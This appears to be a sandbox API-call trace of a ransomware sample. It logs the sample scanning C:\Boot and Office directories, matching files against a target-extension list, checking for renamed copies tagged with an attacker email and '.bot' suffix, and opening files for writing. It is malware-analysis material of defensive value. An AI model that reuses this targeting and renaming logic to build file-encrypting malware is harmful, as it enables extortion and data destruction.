	[0171.703] lstrlenW (lpString=".dbf") returned 4
	[0171.703] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.703] lstrlenW (lpString=".1cd") returned 4
	[0171.703] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.703] lstrlenW (lpString=".jpg") returned 4
	[0171.703] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.703] lstrlenW (lpString=".doc") returned 4
	[0171.703] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.703] lstrlenW (lpString=".docx") returned 5
	[0171.703] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0171.703] lstrlenW (lpString=".pdf") returned 4
	[0171.703] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString=".xls") returned 4
	[0171.703] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString=".xlsx") returned 5
	[0171.703] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0171.703] lstrlenW (lpString=".ppt") returned 4
	[0171.703] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.703] lstrlenW (lpString=".zip") returned 4
	[0171.703] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.704] lstrlenW (lpString=".rar") returned 4
	[0171.704] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.704] lstrlenW (lpString=".bz2") returned 4
	[0171.704] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.704] lstrlenW (lpString=".7z") returned 3
	[0171.704] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.704] lstrlenW (lpString=".dbf") returned 4
	[0171.704] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.704] lstrlenW (lpString=".1cd") returned 4
	[0171.704] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\MAIL.ICO") returned 68
	[0171.704] lstrlenW (lpString=".jpg") returned 4
	[0171.704] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.704] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.704] lstrlenW (lpString="ModifiedTelespace.ico") returned 21
	[0171.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ModifiedTelespace.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\modifiedtelespace.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 63
	os_tid = 0x788

	[0137.498] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xb4d2fe8
	[0137.499] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xb4e2ff0
	[0137.499] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0xb4d15d0
	[0137.499] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac8a8
	[0137.499] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0xb4d15e8
	[0137.499] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb8a0020
	[0137.500] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0xb4d1600
	[0137.500] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0xb4d1600, Size=0x20) returned 0xb4d1f20
	[0137.500] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0xb4d1600
	[0137.500] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0xb4d1600, Size=0x20) returned 0xb4d1f48
	[0137.500] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.500] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.500] Wow64DisableWow64FsRedirection (in: OldValue=0xad0ff58 | out: OldValue=0xad0ff58*=0x0) returned 1
	[0137.500] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.500] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb4d1f20 | out: hHeap=0x7ab0000) returned 1
	[0137.500] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.500] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb4d1f48 | out: hHeap=0x7ab0000) returned 1
	[0137.500] Sleep (dwMilliseconds=0x64) 
	[0137.689] lstrlenW (lpString="BCD") returned 3
	[0137.689] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.689] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.689] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.689] lstrlenW (lpString=".doc") returned 4
	[0137.689] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1
	[0137.689] lstrlenW (lpString=".docx") returned 5
	[0137.690] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".pdf") returned 4
	[0137.690] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".xls") returned 4
	[0137.690] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".xlsx") returned 5
	[0137.690] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".ppt") returned 4
	[0137.690] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString=".zip") returned 4
	[0137.690] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".rar") returned 4
	[0137.690] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".bz2") returned 4
	[0137.690] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".7z") returned 3
	[0137.690] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString=".dbf") returned 4
	[0137.690] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString=".1cd") returned 4
	[0137.690] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString=".jpg") returned 4
	[0137.690] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.690] lstrlenW (lpString=".doc") returned 4
	[0137.690] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1
	[0137.690] lstrlenW (lpString=".docx") returned 5
	[0137.690] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".pdf") returned 4
	[0137.691] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".xls") returned 4
	[0137.691] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".xlsx") returned 5
	[0137.691] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".ppt") returned 4
	[0137.691] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.691] lstrlenW (lpString=".zip") returned 4
	[0137.691] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".rar") returned 4
	[0137.691] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".bz2") returned 4
	[0137.691] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString=".7z") returned 3
	[0137.691] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0137.691] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.691] lstrlenW (lpString=".dbf") returned 4
	[0137.691] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.691] lstrlenW (lpString=".1cd") returned 4
	[0137.691] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1
	[0137.691] lstrlenW (lpString="C:\\Boot\\BCD") returned 11
	[0137.691] lstrlenW (lpString=".jpg") returned 4
	[0137.691] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1
	[0137.691] lstrcmpiW (lpString1=".LOG1", lpString2=".bot") returned 1
	[0137.691] lstrlenW (lpString="BCD.LOG1") returned 8
	[0137.692] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.692] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=0) returned 1
	[0137.692] CloseHandle (hObject=0x298) returned 1
	[0137.692] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.692] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.692] lstrlenW (lpString=".doc") returned 4
	[0137.692] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1
	[0137.692] lstrlenW (lpString=".docx") returned 5
	[0137.692] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1
	[0137.692] lstrlenW (lpString=".pdf") returned 4
	[0137.692] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1
	[0137.692] lstrlenW (lpString=".xls") returned 4
	[0137.692] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1
	[0137.692] lstrlenW (lpString=".xlsx") returned 5
	[0137.692] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1
	[0137.692] lstrlenW (lpString=".ppt") returned 4
	[0137.692] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1
	[0137.692] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.692] lstrlenW (lpString=".zip") returned 4
	[0137.692] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1
	[0137.692] lstrlenW (lpString=".rar") returned 4
	[0137.693] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString=".bz2") returned 4
	[0137.693] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString=".7z") returned 3
	[0137.693] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString=".dbf") returned 4
	[0137.693] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString=".1cd") returned 4
	[0137.693] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString=".jpg") returned 4
	[0137.693] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString=".doc") returned 4
	[0137.693] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString=".docx") returned 5
	[0137.693] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1
	[0137.693] lstrlenW (lpString=".pdf") returned 4
	[0137.693] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString=".xls") returned 4
	[0137.693] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString=".xlsx") returned 5
	[0137.693] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1
	[0137.693] lstrlenW (lpString=".ppt") returned 4
	[0137.693] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1
	[0137.693] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.693] lstrlenW (lpString=".zip") returned 4
	[0137.693] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1
	[0137.694] lstrlenW (lpString=".rar") returned 4
	[0137.694] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1
	[0137.694] lstrlenW (lpString=".bz2") returned 4
	[0137.694] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1
	[0137.694] lstrlenW (lpString=".7z") returned 3
	[0137.694] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1
	[0137.694] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.694] lstrlenW (lpString=".dbf") returned 4
	[0137.694] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1
	[0137.694] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.694] lstrlenW (lpString=".1cd") returned 4
	[0137.694] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1
	[0137.694] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16
	[0137.694] lstrlenW (lpString=".jpg") returned 4
	[0137.694] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1
	[0137.694] lstrcmpiW (lpString1=".LOG2", lpString2=".bot") returned 1
	[0137.694] lstrlenW (lpString="BCD.LOG2") returned 8
	[0137.694] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.694] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=0) returned 1
	[0137.694] CloseHandle (hObject=0x298) returned 1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString=".doc") returned 4
	[0137.695] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".docx") returned 5
	[0137.695] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1
	[0137.695] lstrlenW (lpString=".pdf") returned 4
	[0137.695] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".xls") returned 4
	[0137.695] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".xlsx") returned 5
	[0137.695] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1
	[0137.695] lstrlenW (lpString=".ppt") returned 4
	[0137.695] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString=".zip") returned 4
	[0137.695] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".rar") returned 4
	[0137.695] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".bz2") returned 4
	[0137.695] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString=".7z") returned 3
	[0137.695] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString=".dbf") returned 4
	[0137.695] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString=".1cd") returned 4
	[0137.695] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString=".jpg") returned 4
	[0137.695] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.695] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.696] lstrlenW (lpString=".doc") returned 4
	[0137.696] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".docx") returned 5
	[0137.696] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1
	[0137.696] lstrlenW (lpString=".pdf") returned 4
	[0137.696] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".xls") returned 4
	[0137.696] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".xlsx") returned 5
	[0137.696] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1
	[0137.696] lstrlenW (lpString=".ppt") returned 4
	[0137.696] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.696] lstrlenW (lpString=".zip") returned 4
	[0137.696] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".rar") returned 4
	[0137.696] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".bz2") returned 4
	[0137.696] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString=".7z") returned 3
	[0137.696] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1
	[0137.696] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.696] lstrlenW (lpString=".dbf") returned 4
	[0137.696] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.696] lstrlenW (lpString=".1cd") returned 4
	[0137.696] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1
	[0137.696] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16
	[0137.696] lstrlenW (lpString=".jpg") returned 4
	[0137.696] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1
	[0137.696] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.697] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.697] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.697] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=89168) returned 1
	[0137.697] CloseHandle (hObject=0x298) returned 1
	[0137.697] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20
	[0137.697] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.697] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.697] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.697] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.697] lstrlenW (lpString=".doc") returned 4
	[0137.697] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.697] lstrlenW (lpString=".docx") returned 5
	[0137.697] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.697] lstrlenW (lpString=".pdf") returned 4
	[0137.697] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.697] lstrlenW (lpString=".xls") returned 4
	[0137.698] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.698] lstrlenW (lpString=".xlsx") returned 5
	[0137.698] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.698] lstrlenW (lpString=".ppt") returned 4
	[0137.698] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString=".zip") returned 4
	[0137.698] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.698] lstrlenW (lpString=".rar") returned 4
	[0137.698] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.698] lstrlenW (lpString=".bz2") returned 4
	[0137.698] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.698] lstrlenW (lpString=".7z") returned 3
	[0137.698] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString=".dbf") returned 4
	[0137.698] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString=".1cd") returned 4
	[0137.698] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString=".jpg") returned 4
	[0137.698] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.698] lstrlenW (lpString=".doc") returned 4
	[0137.698] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.698] lstrlenW (lpString=".docx") returned 5
	[0137.698] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.698] lstrlenW (lpString=".pdf") returned 4
	[0137.698] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.698] lstrlenW (lpString=".xls") returned 4
	[0137.698] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.699] lstrlenW (lpString=".xlsx") returned 5
	[0137.699] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.699] lstrlenW (lpString=".ppt") returned 4
	[0137.699] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.699] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.699] lstrlenW (lpString=".zip") returned 4
	[0137.699] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.699] lstrlenW (lpString=".rar") returned 4
	[0137.699] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.699] lstrlenW (lpString=".bz2") returned 4
	[0137.699] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.699] lstrlenW (lpString=".7z") returned 3
	[0137.699] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.699] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.699] lstrlenW (lpString=".dbf") returned 4
	[0137.699] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.699] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.699] lstrlenW (lpString=".1cd") returned 4
	[0137.699] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.699] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29
	[0137.699] lstrlenW (lpString=".jpg") returned 4
	[0137.699] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.699] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.699] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.699] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.700] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=87616) returned 1
	[0137.700] CloseHandle (hObject=0x298) returned 1
	[0137.700] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20
	[0137.700] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.700] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.700] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.700] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.700] lstrlenW (lpString=".doc") returned 4
	[0137.700] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.700] lstrlenW (lpString=".docx") returned 5
	[0137.700] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.700] lstrlenW (lpString=".pdf") returned 4
	[0137.700] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.700] lstrlenW (lpString=".xls") returned 4
	[0137.700] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.700] lstrlenW (lpString=".xlsx") returned 5
	[0137.700] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.700] lstrlenW (lpString=".ppt") returned 4
	[0137.700] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.700] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
